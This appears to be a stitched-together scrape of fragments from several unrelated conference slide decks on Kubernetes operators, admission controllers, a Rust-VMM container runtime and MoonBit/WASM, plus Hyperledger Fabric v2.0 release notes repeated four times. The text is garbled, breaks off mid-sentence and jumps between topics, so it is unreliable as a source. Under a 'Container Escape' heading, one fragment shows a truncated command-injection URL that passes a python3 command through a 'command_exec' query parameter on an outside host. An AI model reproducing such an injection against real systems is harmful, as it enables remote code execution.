Best practices for building Kubernetes Operators Patryk WasielewskiAbout me ● DevOps Consultant at Amazon Web Services (AWS) ● 6 years professional experience as DevOps / SRE / Developer ● Cloud-native playerAgenda ● Controllers, Operators? What are Those? ● Validation & Defaulting ● Finalizers ● Local Clusters and testing units ● Loose thoughts? ● Useful linksControllers, Operators? What are those?CRDsCRDs json-patch/merge-patch support ○ Finalizers ○ Built-in Authz/AuthnControllers https://able8.medium.com/kubernetes-controllers-overview-b6ec086c1fbControllers ● Controller tracks at least one resource type ●

on Post-Kubernetes 郑伟 ⽯墨⽂档 Background in Shimo Language • Go • Node • Rust Background in Shimo Framework • Gin • Echo • gRPC • … Background in Shimo Platform • All in Kubernetes • Ingress IDL Debug IDL Mock ... API Gateway Framework（Ego） Auth Interceptor Metrics IDL Docs Kubernetes Redis CMP DB CMP Log Interceptor Err Interceptor Metric Interceptor MQ CMP Mongo Debugging • How to debugging service with dependencies? • Use VPN to connect develop kubernetes cluster. • With Kubernetes API server Resolver, we can resolve dependent services. IDL Tool Chain - gRPC Local

Yingzhe Ru(@ruyingzhe), Tencent Liangyu Zhou(@choujimmy), Tencent Implement Kubernetes Runtime Based on Rust-VMM About Us Yingzhe Ru Senior Software Engineer at Tencent Working on TKEStack project in Container and Kubernetes field, promote lots of K8S production practice in Tencent Motivation https://kccncchina2018english.sched.com/event/FuLz/layers-of-isolation-in-kubernetes-tim-allclair-google gle Kubernetes has many layers of isolation, but we will focus on pod-to-pod isolation in this talk, AKA Sandbox Isolation. • Container Escape docker.vh.neargle.com:8888/?command_exec=python3 -c "import

用 Python 给 Kubernetes 写个控制器 主讲人： 张晋涛 个人介绍 Apache APISIX PMC Kubernetes Ingress NGINX maintainer Microsoft MVP 『 K8S 生态周报』发起人和维护者 GitHub：tao12345666333 Mail: zhangjintao@apache.org Agenda Agenda Kubernetes 中请求处理流程 什么是准入控制器 用 Python 实现准入控制器 与其他方案对比 Kubernetes 架构 kube-apiserver Kubernetes 集群的核心组件 处理集群内外的所有请求 Kubernetes 请求处理流程  API Handler 匹配处理链路（ /apis ）  认证 / 授权  Mutating 关操作的代码逻辑或者组件  （静态）准入控制器： Kubernetes 代码中携带，不可动 态调整的  动态准入控制器：利用 Kubernetes 提供的 MutatingAdmissionWebhook 和 ValidatingAdmissionWebhook 扩展点，由用户自行开发 的组件，接收 HTTP 回调。 为什么需要准入控制器  Kubernetes 中一系列复杂的校验 / 事务逻辑

MoonBit 编程语言（WASM 技术） 服务端应用展望 以及对Kubernetes生态的影响 沙渺（MoonBit 语言社区开发者） 本分享包含大量目前尚处在早期开发阶段甚至概念阶段， 尚未获得广泛应用的技术。 仅为前景展望，不推荐用于当前立项开发的实际工程。 敬请注意 内容 • WASM 技术栈现状和 WASM 后端应用的构想 • MoonBit 语言介绍 • MoonBit MoonBit 方案对 WASM 技术栈的作用 • 对 Kubernetes 提出的挑战 分享者 • 沙渺，大连本地独立开发者 • Rust 语言社区早期参与者 The Rust Programming Language（中文纸质版）译者3 • MoonBit 语言社区开发者 官方标准库代码、教程资料编写者 WebAssembly (WASM) WASM 现状 • 1.0 MVP 已稳定（2017）已被 应用于后端的构想初步存在 但具体的挑战非常巨大 Kubernetes + WASM • 方法（1）将 WASM 独立运行时程序看作工作负载 Kubernetes containerd + Linux image 独立运行时 .wasm 独立运行时 .wasm 独立运行时 .wasm 独立运行时 .wasm Kubernetes + WASM • 方法（2）直接将 WASM

language, such as Go. “Kubernetes Operator 是一种特定于应用的控制器，可扩展 Kubernetes API 的功能，来代表 Kubernetes 用 户创建、配置和管理复杂应用的实例。” https://www.redhat.com/zh/topics/containers/what-is-a-kubernetes-operator https://developers com/articles/2021/06/22/kubernetes-operators-101-part-2-how-operators-work 为什么使用Operator? • Kubernetes生态系统 比如监控、日志、Dashboard等 • Kubernetes集群基础能力 比如自动化安装、配置、更新等。 • Kubernetes API 避免了重复开发资源的增删改查等框架代码 informer-gen: 生成informer，提供事件机制 (AddFunc,UpdateFunc,DeleteFunc)来响应 kubernetes的event lister-gen: 为get和list方法提供只读缓存层 https://github.com/kubernetes/code-generator 根据定义的结构，利用code-generator生成对应 的operator代码 CR

major release since v1.0, Fabric v2.0 delivers important new features and changes for users and operators alike, including support for new application and privacy patterns, enhanced governance around smart documentation). External chaincode launcher The external chaincode launcher feature empowers operators to build and launch chaincode with the technology of their choice. Use of external builders and back to the peer. It is now possible to run chaincode as an external service, for example in a Kubernetes pod, which a peer can connect to and utilize for chaincode execution. See Chaincode as an external

major release since v1.0, Fabric v2.0 delivers important new features and changes for users and operators alike, including support for new application and privacy patterns, enhanced governance around smart documentation). External chaincode launcher The external chaincode launcher feature empowers operators to build and launch chaincode with the technology of their choice. Use of external builders and back to the peer. It is now possible to run chaincode as an external service, for example in a Kubernetes pod, which a peer can connect to and utilize for chaincode execution. See Chaincode as an external

major release since v1.0, Fabric v2.0 delivers important new features and changes for users and operators alike, including support for new application and privacy patterns, enhanced governance around smart documentation). 2.4 External chaincode launcher The external chaincode launcher feature empowers operators to build and launch chaincode with the technology of their choice. Use of external builders and back to the peer. It is now possible to run chaincode as an external service, for example in a Kubernetes pod, which a peer can connect to and utilize for chaincode execution. See Chaincode as an external

major release since v1.0, Fabric v2.0 delivers important new features and changes for users and operators alike, including support for new application and privacy patterns, enhanced governance around smart documentation). 2.4 External chaincode launcher The external chaincode launcher feature empowers operators to build and launch chaincode with the technology of their choice. Use of external builders and back to the peer. It is now possible to run chaincode as an external service, for example in a Kubernetes pod, which a peer can connect to and utilize for chaincode execution. See Chaincode as an external